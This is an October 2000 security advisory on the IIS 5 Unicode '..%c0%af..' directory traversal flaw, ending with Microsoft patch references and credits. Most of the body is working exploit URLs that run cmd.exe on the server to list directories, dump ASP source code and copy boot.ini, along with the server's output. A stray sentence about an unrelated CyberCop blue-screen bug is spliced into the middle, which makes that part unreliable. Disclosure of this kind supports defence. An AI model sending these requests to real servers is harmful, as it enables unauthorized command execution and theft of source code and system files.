iis.asp.txt

`______________________________________________________________________  
NtWaK0  
Bug / Security / Advisory  
Saturday, October 21, 2000  
IIS 5 and using ..%c0%af../winnt/system32/cmd.exe?/c+type+c:  
To Read any ASP source Code of the server  
______________________________________________________________________  
  
o Synopsis  
  
Based on http://www.wiretrip.net/rfp/p/doc.asp?id=57&iface=2  
  
I done some research and found that that ..%c0%af.. can be used to do  
more then just directory Listing :)  
  
RISK FACTOR: HIGH  
______________________________________________________________________  
  
o Vulnerable Systems  
  
IIS 5.0 maybe IIS 4 I did not check it  
______________________________________________________________________  
  
o Vulnerability Information  
  
Well what i have tried is Reading ASP source code and i was able to  
using this syntax :  
http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\i  
netpub\wwwroot\home\*.*  
http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+type+c:\  
inetpub\wwwroot\home\default.asp  
  
And sure here is the source code:  
  
Dim sServerName, sLocalAddress, sRemoteAddress  
sServerName = Request.ServerVariables("SERVER_NAME")  
sLocalAddress = Request.ServerVariables("LOCAL_ADDR")  
sRemoteAddress = Request.ServerVariables("REMOTE_ADDR") %>  
  
An implementation flaw in cybercop engine allows a local Blue Screen  
of Death (BSOD) on NT 4.0 (Sp6a + All Hot Fixes Installed).  
  
Now let us do more stuff, you can save a file example  
http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\b  
oot.ini  
so you will get promted if you wana save the file or open it  
  
Next I done  
http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\  
boot.ini+c:\bobo.ini  
  
that gave me different error ...  
  
CGI Error  
The specified CGI application misbehaved by not returning a complete set of  
HTTP headers. The headers it did return are:  
c:\boot.ini  
The system cannot find the file specified.  
0 file(s) copied.  
  
Hrm interresting and the file is located in c:\boot.ini :)  
  
  
At this point i stoped working on that and sure you can do more then DIR  
LISTING  
  
______________________________________________________________________  
o Resolution  
  
Microsoft has released MS00-078 to warn of the problem. The patch from  
MS00-057 ("File permission canonicalization") fixes this problem  
______________________________________________________________________  
o Credits  
The discovery of this vulnerability was conducted by Par Osterberg  
some other reasearch was done by rain forest puppy and some by NtWaK0  
______________________________________________________________________  
  
  
______________________________________________________________________  
The only secure computer is one that's unplugged, locked in a safe,  
and buried 20 feet under the ground in a secret location... and i'm  
not even too sure about that one"--Dennis Huges, FBI.  
____________________________________________________________._________  
Live Well Do Good |  
Accept no limitations \(|)/  
--(")--  
/`\ NtWaK0  
  
`